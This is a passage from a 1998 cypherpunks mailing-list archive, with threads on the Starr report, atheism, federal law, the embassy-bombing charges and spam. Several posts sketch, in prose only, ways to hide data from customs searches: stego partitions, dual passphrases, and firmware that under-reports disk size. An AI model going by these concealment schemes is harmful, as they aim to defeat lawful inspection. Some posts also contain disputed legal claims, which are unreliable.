identify itself as a 3Gb drive when it was actually a 5 Gb drive. Add
some kind of extended command to the drive that allowed you to
activate/deactivate the extended region at will. Without a password of
course, the additional command would just report the appropriate error.
Then just make sure you have an extra slot in the partition table to
address the extended region unless you want to write a low-level driver.

Any Quantum or Maxtor persons on the list?

Mike

Security requires hardware and software.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Mon, 21 Sep 1998 14:12:50 +0800
To: Petro <petro@playboy.com>
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <3.0.5.32.19980920152605.0086ba30@205.83.192.13>
Message-ID: <3606A58F.385B@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Petro wrote:
> 
> At 11:50 AM -0500 9/21/98, Michael Motyka wrote:
> >Starr's base approach to justice is the opening shot of what I hope
> >turns into an all-out scorched-earth battle. Let 'em all fall down. I'm
> >just afraid that when it's over the only people who will be willing to
> >run for public office will be truly dangerous people who have no respect
> >for liberty not of their own definition.
> 
>         Which is different from today how?
> 
In spite of their <numerous?> shortcomings, many of today's politicians
in both parties seem to be fairly pragmatic, 'middle of the road' types.
If the only people who can pass muster under the emerging standards are
religous fundamentalists then we will have a Bill of Rights under attack
problem that is another order of magnitude greater than we have right
now. Scares me because while I'm pretty much a live and let live sort,
some of the fundamentalists I've known are not very tolerant. 

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Mon, 21 Sep 1998 14:25:22 +0800
To: cypherpunks@toad.com
Subject: Re: Chemical Analysis of Laptop strap.
In-Reply-To: <199809190501.HAA12423@replay.com>
Message-ID: <3606A678.40A4@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> So I fly home Friday from San Jose.  Probably because I was
> in a hurry, after walking through the magnetometer and x-raying
> my stuff, a security dude grabbed my laptop and said he wanted
> to 'analyze' it.  Yeah sure whatever, I decided not to protest
> I was late for my flight.
> 
> This analysis, it turned out, was wiping a coffee filter over the strap
> of its bag, and sticking the coffee filter into a slot on a machine.
> No solvent even.  The machine had columns labelled TNT RDX NITRO PETN HMX.
> I recognized the first four as high explosives.  Later, I wondered
> if people with angina (who take nitro orally) ever set this off.
> Most of them, of course, are not bearded eastern-european/semetic
> guys in their 30's who look worried and in a hurry.
> 
> Anyway, that was it, and I made my flight.  Didn't even open
> the laptop's case.
> 
> The machine name was ION-something; I wonder whether it sucked vapors
> from the fiber disk or whether it was a neutron-spectrometer (?) device.
> 
> (Had this been a UK Customs 'inspection' of the contents of the disk, I
> might have had to explain the half-gig of "noise" I have on the disk.
> Only, it really is noise. Really.)
> 
> Anyway, the moral of the story:
> 
> Don't store your laptop with your explosives :-)
> 
> 
Just wait until you've had a cavity search and been grilled for four
hours because you fed Miracle-Gro to your prize peonies just before
leaving on your trip. It's pretend security. Feel-good stuff. Better to
do NMR of any large-volume object although the magnetic field migh fuck
up your drive.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Mon, 21 Sep 1998 15:08:50 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: atheism (was: RE: Democracy... (fwd)) (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A192846CE@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> As I've demonstrated before (and for the last time):
> 
> ^(A) = (^A)

f() = belief function
A = hypothesis
^ = not

f(^A) != ^f(A)

At least not without placing requirements on f().

Then you claim everything is a belief, so f() is meaningless. But then
you deny A == A when you claimed that metaphysical objectivity is a
belief, so what was the point in writing the equation in the first
place?

Go transcend.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 21 Sep 1998 13:32:56 +0800
To: howree@cable.navy.mil>
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <3.0.5.32.19980920152605.0086ba30@205.83.192.13>
Message-ID: <v03110701b22c480498a3@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:50 AM -0500 9/21/98, Michael Motyka wrote:
>Starr's base approach to justice is the opening shot of what I hope
>turns into an all-out scorched-earth battle. Let 'em all fall down. I'm
>just afraid that when it's over the only people who will be willing to
>run for public office will be truly dangerous people who have no respect
>for liberty not of their own definition.

	Which is different from today how?

--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 21 Sep 1998 06:15:14 +0800
To: cypherpunks@einstein.ssz.com
Subject: No Subject
Message-ID: <199809211117.NAA29900@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



...


      some of the internal key-IDs have been modified. however, both
      versions should have been posted in various 'true' messages. No
      information if some of the false messages were ever encrypted
      with the key twiddles in hidden 32 bits, but probably not.


...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bram <bram@gawth.com>
Date: Mon, 21 Sep 1998 15:15:04 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809211030.FAA05159@mixer.visi.com>
Message-ID: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 21 Sep 1998, Bruce Schneier wrote:

> Here's the basic idea:  Strew a million passwords on your hard drive, and
> make it impossible to verify which is the correct one offline.  So, someone
> who steals the password file off the client cannot run a cracking tool
> against the file.

Is this really patentable? It sounds a *lot* like the original public-key
algorithm (the one involving lots of little 'puzzles')

-Bram




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Mon, 21 Sep 1998 15:32:25 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: This is a listed crime?
Message-ID: <33CCFE438B9DD01192E800A024C84A192846CF@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




>     silence 		obstruction of justice
>     false information	lying to a federal agent in course of ...
>     ...

Regarding the 5th amendment and other laws and precedence involving the
right to remain silent, the right against self-incrimination, etc, how
far could one carry that as an excuse to remain silent?

I mean I have no doubt given the number of laws and regulations on the
books that I will say something self-incriminating by some obscure law
and/or obscure interpretation every sixth or seventh sentence.


	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Mon, 21 Sep 1998 00:58:16 +0800
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: uk police and warrents
In-Reply-To: <199809201922.PAA09395@domains.invweb.net>
Message-ID: <Pine.LNX.3.96.980921135909.19114B-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 20 Sep 1998, William H. Geiger III wrote:

> >The UK police are pushing for access to people's email _without_ having a
> >warrent.
> 
> >THey also want the ISPs to store everyone's mail for a week..
> 
> Encrypt everything and let them keep it as long as they want. :)

Until they come for your keys.  (Also without a warrent.)

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Mon, 21 Sep 1998 09:22:29 +0800
To: Information Security <guy@panix.com>
Subject: Re: This is a listed crime?
In-Reply-To: <199809210818.EAA08107@panix7.panix.com>
Message-ID: <Pine.BSF.3.96.980921142104.397Q-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 21 Sep 1998, Information Security wrote:

>#   Bin Laden has suffered other setbacks recently. On Wednesday night, the
>#   FBI arrested Wadih el Hage, an Arlington, Texas man who law enforcement
>#   officials charge worked with bin Laden and Al-Din in Sudan, and with
>#   Fazil in Kenya from 1994 to 1997. He has been charged with lying to the
>#   FBI about his relationship with other bin Laden operatives, including a
>#   senior bin Laden lieutenant who drowned in a 1996 ferryboat accident in
>#   Tanzania.
>
>Is "lying to the FBI" a law on the books, or is the actual
>charge something else?
>---guy
>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

  dont want to take the time to look up the 18 USC reference, but
  providing deliberately false information to _any_ federal agent 
  is a felony--  that includes the IRS. if nothing else, such as
  telling a federal agent to fuck-off, they will charge you with
  obstruction of justice.
  
  for all who think the Bill of Rights really means something, 
  consider:
  
    silence 		obstruction of justice
    false information	lying to a federal agent in course of ...
    ...
  
  too many to list; also, each of the regulatory agencies have
  their own courts and regulations which usurp the Congressional
  mandate for legislation of the Constitution. The regulatory
  courts have broad powers and their decisions, both criminal and
  civil, can be entered in Federal District Court; you, of course,
  have right of review in Federal District Court, for what that is
  worth --by the time you get that far in the procedings, you're
  out of money for the mandatory lawyers the original 13th amendment
  was created to prevent --the government has confiscated your
  property without due process, and before "conviction" under the
  seizure laws which permit them to grab assets at the time of
  the arrest --even if you are acquitted, there is little if any
  guarantee your property will be restored --if in the meantime
  it is sold at 10 cents on the dollar at auction, you may be 
  entitled to that dime.
  
  welcome to democracy in action.
  
  	attila out....
  

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Comment: No safety this side of the grave. Never was; never will be.
Charset: noconv

iQA/AwUBNgZfzz7vNMDa3ztrEQIwlwCdGMfStrZLM9b3QFss95M/oxiuUHQAn1s9
ETc8Fr1fsDRoBjwZlFvKlBK5
=QsY1
-----END PGP SIGNATURE-----


__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 21 Sep 1998 14:42:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <3.0.5.32.19980920152605.0086ba30@205.83.192.13>
Message-ID: <v03110701b22c595b40e4@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:14 PM -0500 9/21/98, Michael Motyka wrote:
>Petro wrote:
>>
>> At 11:50 AM -0500 9/21/98, Michael Motyka wrote:
>> >Starr's base approach to justice is the opening shot of what I hope
>> >turns into an all-out scorched-earth battle. Let 'em all fall down. I'm
>> >just afraid that when it's over the only people who will be willing to
>> >run for public office will be truly dangerous people who have no respect
>> >for liberty not of their own definition.
>>
>>         Which is different from today how?
>>
>In spite of their <numerous?> shortcomings, many of today's politicians
>in both parties seem to be fairly pragmatic, 'middle of the road' types.
>If the only people who can pass muster under the emerging standards are
>religous fundamentalists then we will have a Bill of Rights under attack
>problem that is another order of magnitude greater than we have right
>now. Scares me because while I'm pretty much a live and let live sort,
>some of the fundamentalists I've known are not very tolerant.

	The "live and let" attitude of todays politician is there simply
because that is where they get the most votes. If they thought that they
would get better results, they's thump the bible just as hard as say...

	Jimmy Swagart.

--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@survey.com
Date: Mon, 21 Sep 1998 17:37:02 +0800
To: cypherpunks@Algebra.COM
Subject: CyberPoll Results - The Starr Report
Message-ID: <199809211435.OAA02024@survey.survey.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for participating in our recent CyberPoll about the Starr Report.  The results are in!  You can access them at http://www.cyberpoll.com/starrresults.html.  

Would you like to participate in our follow-up CyberPoll about the Clinton Tapes?  If so, please go to http://www.cyberpoll.com/clintontapes.html.

Thank you again for your participation.

World Research, Inc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 21 Sep 1998 13:33:30 +0800
To: attila <guy@panix.com>
Subject: Re: This is a listed crime?
In-Reply-To: <199809210818.EAA08107@panix7.panix.com>
Message-ID: <199809211834.OAA20729@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:22 PM 9/21/98 +0000, attila wrote:
>  dont want to take the time to look up the 18 USC reference, but
>  providing deliberately false information to _any_ federal agent 
>  is a felony--  that includes the IRS. 

True

>  if nothing else, such as
>  telling a federal agent to fuck-off, they will charge you with
>  obstruction of justice.

False.  You are never required to talk to a peace officer, Fed, or
investigator unless you want to.  They can arrest you of course (with
probable cause ha ha).  Even then, you still don't have to talk to them.
In criminal cases you *never* have to talk to anyone.

>  too many to list; also, each of the regulatory agencies have
>  their own courts and regulations which usurp the Congressional
>  mandate for legislation of the Constitution. The regulatory
>  courts have broad powers and their decisions, both criminal and
>  civil, can be entered in Federal District Court; 

The agencies have no criminal adjudicatory power (aside from a few odd
circumstances).  They can seize property of course (if you have it where it
can be seized) but they (mostly) can't lock you up.

>  you, of course,
>  have right of review in Federal District Court, for what that is
>  worth --by the time you get that far in the procedings, you're
>  out of money for the mandatory lawyers the original 13th amendment
>  was created to prevent 

Lawyers aren't mandatory.  Colin Ferguson defended himself on nine murder
counts without one (and lost).  The Long Island Railroad gunman.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 21 Sep 1998 15:10:16 +0800
To: cypherpunks@toad.com
Subject: Re: Stego-empty hard drives...
In-Reply-To: <v04011743b229a12c2f0b@[139.167.130.247]>
Message-ID: <v03110702b22c5dfb572e@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:06 PM -0500 9/21/98, Michael Motyka wrote:
>Robert Hettinga wrote:
>> Stegoing an encrypted partition as "blank" hard drive space without
>> actually writing over it unless you wanted to?
>>
>A freshly formatted partition has a fill value. Noise would indicate
>that is is not fresh. This would not be proof that it contained
>encrypted data but it would indicate some sort of use.
>
>Another layer:
>	create a partition.
>	Use it as an archive for 'unclassified' materials.
>	At some point after the use has fragmented it enough to look real:
>		disable all automatic accesses ( temp files, caches ... )
>to the
>partition
>		create an application program that uses the unused space as
>a secure
>filesystem
>
>Then the partition would be arguably "in normal use" and it could get
>tough to prove the nature of the unused space. You could even leave some
>space filled with the format fill value. Not sure how to hide the app.
>maybe as passphrased option in some innocuous custom application.
>Accounting app?

	Passphrase at startup. One phrase allows access to the "stego'd" areas,
the other allows access to the "cover" areas.

	This wouldn't stand source code inspection, but if you used some
sort of Pretty Lousy Privacy on the "cover" data, and an uncompromised
crypto on the rest you might pass all but the most rigourous investigation.

	Of course, if you are getting an extremely rigourous investigation,
you don't need good crypto, you need good PR, and a good lawyer because
they WILL find something, unless they think hanging your butt will cause
riots.


--
Five seconds later, I'm getting the upside of 15Kv across the nipples.
(These ambulance guys sure know how to party).
The Ideal we strive for: http://www.iinet.net.au/~bofh/bofh/bofh11.html
No, I don't speak for playboy, They wouldn't like that. They really wouldn't.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Mon, 21 Sep 1998 10:31:20 +0800
To: Jim Choate <cypherpunks@toad.com>
Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)
In-Reply-To: <199809202202.RAA14798@einstein.ssz.com>
Message-ID: <Pine.BSF.3.96.980921142713.397R-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Sun, 20 Sep 1998, Jim Choate wrote:

>Forwarded message:
>
>> From: pjm@spe.com
>> Date: Sun, 20 Sep 1998 20:13:38 +0200
>> Subject: atheism (was: RE: Democracy... (fwd)) (fwd)
>>
   [snip]

>No, atheism is the statement that "God could exist, but doesn't". Whether
>one chooses to hang 'Bhuddism' or 'Wiccan' on is irrelevant. We aren't
>discussion labels but rather characteristics. Fundamentaly *ALL* atheism
>states:
>
>While it could happen that way, I don't believe it does.
>
>Which is identical in meaning to:
>
>While it could happen that way, I believe it doesn't.
>
>>      Getting back to the strong v. weak distinction, the weak atheist
>> position that one "does not believe god(s) exist" does not constitute
>> a belief, a set of beliefs, or a personal philosophy, let alone a
>> religion.  The strong atheist position that one "believes god(s) do
>> not exist" is actually making a knowledge claim and so does constitute
>> a belief.
>
>Try to sell that spin-doctor bullshit to somebody else, and read a book on
>basic logic.
>
    agreed, the strong v. weak atheist argument is _impossible_. 
    
    however, an interesting premise I posited to my 14 year old son
    who had gone through his scientific awareness state and
    consequently declared himself an "aethist". at the time he was in
    a boarding school and we were in conversation with the chief
    counselor who happened to be a member of an LDS bishopric:
      
      kid:	  yes, an aethist.
      
      father:	  so... you "deny" God's existence since their is no
      		  "proof" of His existence. did you ever consider that in
      		  order to "deny" anything, you must have defined that
      		  concept?  in other words, to deny God, you must have
      		  determined that I or someone else has defined God in
      		  order for you to be able to "deny" God?
      ...
      counselor:  is there a difference between belief and faith?
      
      ...
      father:	  aethism is a concept which is almost impossible to
      		  define as it is a denial that if it could it doesnt.
      		  it is much easier to defend "agnosticism" where you
      		  admit you do not believe, or have faith, because you
      		  lack sufficient scientific proof. aethism is not
     		  doubting, it is denying, even in the face of proof.
      
      		  consider this in terms of both belief and faith:
		  
		  suppose you die, and despite your lack of belief or
		  faith, you find yourself before the throne of God.
		  
		  as your awareness returns, you look up and the image
		  of God is the image of an orangutan --now what are
		  you going to do?
		  
    without missing a heartbeat:
		  
      counselor:  I think you better get down on your knees and pray!

    I seriously thought I would face an LDS disciplinary council for
    that spontaneous off-the-wall comment. I didn't, but I have rocked
    more than a few boats. and, it does point out the extent to which
    belief is based on faith. to the literalists who point to Genesis
    and "God created man in his own image" I always suggest that God
    in the process could have refined homo sapiens over the years and 
    the original creation may have been significantly more endowed
    with hair; secondly, God can appear to man in any form He chooses:
    the burning bush, the blinding light to Saul, etc.
    
    however, stating beliefs and disbeliefs is fine; trying to convince
    another whose beliefs or disbeliefs are securely anchored in whatever
    they believe as truth, is futile. I will accept, without trying to
    change, anyone's "religious" beliefs as their beliefs; I only ask 
    they extend the same tolerance to me.
    
	attila out...

>
    [snip]

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Comment: No safety this side of the grave. Never was; never will be.
Charset: noconv

iQA/AwUBNgZuCj7vNMDa3ztrEQLR7gCg7cqx1bA29pe+fBCb7DcyPundpGsAn39U
hhEHvCh4fgriwDbOO/QbTdn3
=gsVI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: galliart <galliart@swbell.net>
Date: Mon, 21 Sep 1998 15:46:10 +0800
To: Friend@public.com
Subject: Fw: Domain Hosting Priced Right.
Message-ID: <3606B6EC46.AD37GALLIART@mail.swbell.net>
MIME-Version: 1.0
Content-Type: text/plain





Forwarded by galliart <galliart@swbell.net>
---------------- Original message follows ----------------
 From: sales@wi-ks.com
 To: galliart@swbell.net
 Date: Mon, 21 Sep 1998 16:21:49 -0400
 Subject: Domain Hosting Priced Right.
--

Computer Service Specialist Co.

CSSC's Web Services

Low cost Web Hosting and Virtual Servers

Place your order now and get your Web site up and running Today!

accounts as low as $9.95 per month

If with in the first month you are not satisfied with your service
we will refund your money!!!!

http://www.wi-ks.com/webhosting




____________________________________________________________________

This message is sent in compliance with the new e-mail bill: SECTION 301, 
Paragraph (a)(2)(C) of s. 1618

Message sent by: 
Mark Galliart 
P.O. Box 301 
Valley Center, Kansas 67147-0301
316-832-9340
sales@wi-ks.com
by auto request mail.
this was sent to you because of someone requested this email.
To be removed, click reply with REMOVE in the subject line.
_____________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 21 Sep 1998 15:04:17 +0800
To: cypherpunks@cyberpass.net
Subject: US Complaints in Embassy Bombings
Message-ID: <199809212005.QAA04784@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We offer three of the US complaints in the embassy
bombings:

   http://jya.com/usa-v-qaeda.htm

These describe charges against Wadih el Hage, Mohamed 
Sadeek Odeh and Haroun Fazil, filed in New York's
Southern District.

El Hage is the American arrested last week that Guy 
referred to with the "This is a listed crime?" thread.

NYT reports on El Hage and Fazil:

   http://jya.com/fazil-el-hage.htm

Odeh is the first suspect arrested at the Pakistani 
border.

Fazil is an explosives expert charged with making the Nairobi 
bomb and directing the op. He is a fugitive with a $2m reward 
offered.

All are allegedly members of Qaeda, Bin Laden's "international
terrorist" group aiming to kill Yanks worldwide for Echelon-type
stuff.

Know who's with Jim and CJ at Springfield? Blind Sheik Omar
of World Trade Center bombing fame and Mafioso John Gotti, 
who nearly croaked from lack of dental care at another pen.

The place has a distinguished history. See its honor roll on
Alta Vista. Search "Medical Facility for Federal Prisoners."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 21 Sep 1998 15:01:46 +0800
To: Michael Motyka <howree@cable.navy.mil>
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <3.0.5.32.19980920152605.0086ba30@205.83.192.13>
Message-ID: <199809212002.QAA03936@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:50 AM 9/21/98 -0700, Michael Motyka wrote:

>Completely illogical. Give me one good reason not to lead with your best
>punch? I suspect Starr's work is voluminous but weak on all other counts
>so he led with what would create the most publicity. 

Starr did an Impeachment Referral with the stuff he had incontrovertible
proof of.  Proof is very difficult when dealing with someone like Clinton
and you don't want to do a Referral with insufficient proof.  Notice that
even with proof of multiple felonies the Clintonistas say that they aren't
important felonies.

>I've said that I'm
>no great fan of Clinton's but this entire investigation is blatantly
>partisan and has brought the political process in this country about as
>low as it is possible to bring it. 

The Special Counsel was appointed at the request of the President after 6
Democrat Senators called for it.  Republicans don't like Clinton but they
don't have to.  

>Starr's base approach to justice is the opening shot of what I hope
>turns into an all-out scorched-earth battle. 

He's just behaving in the way the Democrats designed the OIC to behave.  A
prosecutor on speed with no boss and no budget.  That was their intent.  US
Attorneys or local DAs would behave the same way if they had the cash.  Law
& Order Liberals like Clinton can hardly complain.  Better him than some
18-year-old drug lookout sentenced to 40 years or some accident-free drunk
driver sentenced to life (Texas recently).

>Let 'em all fall down. I'm
>just afraid that when it's over the only people who will be willing to
>run for public office will be truly dangerous people who have no respect
>for liberty not of their own definition.

Like Clinton, right?  I certainly like to see the damage to the Presidency.
 We also don't have to worry about any tobacco legislation for a few years.  

DCF

"We'll give you more than you deserve.  We'll give you Justice."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Mon, 21 Sep 1998 15:11:51 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Stego-empty hard drives...
In-Reply-To: <199809192012.WAA05755@replay.com>
Message-ID: <3606B18A.C95F4F0A@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

> Once they realize people are doing this, they will begin taking hashes or
> some other record of the blank space. The next time you are scanned by
> customs, they pull the record and compare the previous "blank"  space with
> the current "blank" space. If they don't match, you're suspect.
> 
> They still cannot prove that you're carrying hidden data. They ask you if
> you know what stego is. They ask you if you have hidden data on your
> drive. If you say yes, they demand to see it. If you say no, they say
> "Okay, then it should be no problem if we push the wipe button on our
> program, should it?"
> 
> If they start doing that they have still won, because now you are not
> carrying the data across the border or the data is destroyed as you cross
> the border.

What's this bullshit, eh?  Just overwrite the BIOS roms in your machine to
return all zeros for the sectors you don't want to show them.  Have some
special passphrase you have to type in while in the BIOS setup program to
deactivate this.  Most newer notebooks have flash upgradeable ROMs anyway.

Better yet, simply have it report a drive size that's much smaller than what
you really have.  i.e. install a 4gb drive, but have the bios only see it as a
1gb disk.  When software tries to read or write beyond the 1gb space, have it
return errors like a real disk would.

Anyone who knows x86 assembly can do this sort of shit.  If you want to get
real wicked on this or are afraid they'll have software that talks directly to
the IDE controller, take apart the disk controller card on the drive itself
and give it this type of functionality (much harder.)  Hell, even if they
switch to taking out your hard drive out of your notebook and duplicating it,
as long as the HD itself reports LESS space than it really has, they can't get
to it, they can't scan it, they can't copy it, they can't overwrite it.

Don't want to do that or can't?  Okay, boot their software in a Virtual CPU
box, and if they try to access I/O directly, have your code intercept and
emulate the access.  They try to run privilidged opcodes, trap'em and make it
look like they're running fine, etc...

Let's get this nice and clear once and for all: Software running on untrusted
(i.e. your notebook) hardware cannot be trusted as it can be fooled and
modified by it.  It doesn't matter how sophisticated their scanning software is
as long as the hardware DOESN'T COMPLY with it's requests.  Software always
asks the hardware to do things for it.  The hardware doesn't have to obey. :)

The solution to getting around this bullshit is in hardware or firmware.

I will ignore Anon's idiotic idea of them comparing blank space before and
after.  That's stupid for one of several very obvious reason: temp files.  If
that's not clear enough, here's another: defrag.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Mon, 21 Sep 1998 16:30:36 +0800
To: bram <bram@gawth.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809211030.FAA05159@mixer.visi.com>
Message-ID: <199809212125.QAA25140@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 01:32 PM 9/21/98 -0700, bram wrote:
>On Mon, 21 Sep 1998, Bruce Schneier wrote:
>
>> Here's the basic idea:  Strew a million passwords on your hard drive, and
>> make it impossible to verify which is the correct one offline.  So, someone
>> who steals the password file off the client cannot run a cracking tool
>> against the file.
>
>Is this really patentable? It sounds a *lot* like the original public-key
>algorithm (the one involving lots of little 'puzzles')

I am not an attorney, so I cannot advise on patentability.  But note that
I simplified the explanation A LOT in the above paragraph.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<z2n0db0n3@auto.sixdegrees.com>
Date: Mon, 21 Sep 1998 15:46:17 +0800
To: "monkeyboy cypher-prik"<cypherpunks@toad.com>
Subject: Your sixdegrees Member Update
Message-ID: <199809212030.NAA20024@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear monkeyboy,

Welcome to your sixdegrees Member Update for the week of September 
17th, sponsored by NET@DDRESS.

=================================================================
Free Email from NET@DDRESS! Get a free and permanent email address 
for the rest of your life, no matter how many times you move, change 
schools, jobs, or switch ISPs. You can also access your email from 
anywhere in the world where you have Internet access! Visit: 

http://netaddress.usa.net/tpl/Subscribe/Step1?AdInfo=N-115-E1
=================================================================

In this Member Update, you'll find:

1.  Your personalized sixdegrees stats
2.  Today's news: people surf through a cornucopia of connections
3.  Today's tip: Set your permissions for people surfing
4.  Design your own FREE sixdegrees mousepad at iPrint.com
5.  Find out exactly what's new in the new sixdegrees
6.  Chat Spotlight: Take great pleasure in these cool chat events

=================================================================
1.  Y O U R   S I X D E G R E E S   S T A T S  (as of September 17th):

CONTACTS
        Total 1st degree contacts:        0
        Total 2nd degree contacts:        0
        Total 3rd degree contacts:        0
        Total 4th degree contacts:        0
        Total 5th degree contacts:        0
        Total 6th degree contacts:        0
        Total 1st-6th degree contacts:    0       

MY BULLETIN BOARD
        Messages posted by you:           0
        Responses to your postings:       0

To add more contacts and to see exactly who's in your 1st degree,
just visit:

        http://www.sixdegrees.com/Services/Circle/MyContacts.cfm

To see who's in your other degrees, visit "all my degrees" at:
 
        http://www.sixdegrees.com/Services/whatwhen/what.asp

To check out "my bulletin board," stop by:

        http://www.sixdegrees.com/Services/BB/BB.cfm

=================================================================
2.  S P O T L I G H T   O N   P E O P L E   S U R F I N G:

people surfing, one of the revolutionary new sixdegrees services, 
lets you literally surf the sixdegrees population starting with 
the people in your 1st degree and working your way through the 
worldwide community of more than 1,000,000 sixdegrees members. 
Click the URL below to give it a try:

        http://www.sixdegrees.com/Services/Who/Who.asp

=================================================================
3.  P E O P L E   S U R F I N G   P R E F E R E N C E S:

With countless ways of getting connected using the new sixdegrees, 
setting your permissions will allow you to reveal only the info you 
want other members to see. For people surfing, you can alter how the 
names in your 1st degree are viewed by other members. Click the URL 
below and scroll to the bottom of the page to set your preferences:

        http://www.sixdegrees.com/Services/Profile/how.cfm

=================================================================
4.  D E S I G N   Y O U R   O W N   F R E E   S I X D E G R E E S   
    M O U S E P A D   A T   I P R I N T . C O M:
 
iPrint.com, the leading Internet print shop, has an amazing offer 
for sixdegrees members. For a limited time only, you can design 
and create your very own personalized sixdegrees mouse pad, FREE of 
charge (shipping is extra). While you are designing your free mouse 
pad with Web graphics, clip art or your own personal photographs, 
check out how iPrint.com can provide you with a convenient way to 
customize and order almost any printed products you need from 
t-shirts and hats to business cards. What are you waiting for?! 
Stop by the URL below to order your free mouse pad: 

        http://www.iprint.com/428.html?ad=6dmpad 

=================================================================
5.  W H A T ' S   N E W   I N   S I X D E G R E E S?

sixdegrees has so many amazing new ways of getting you connected 
that we'd be hard pressed to find something that isn't new. Check 
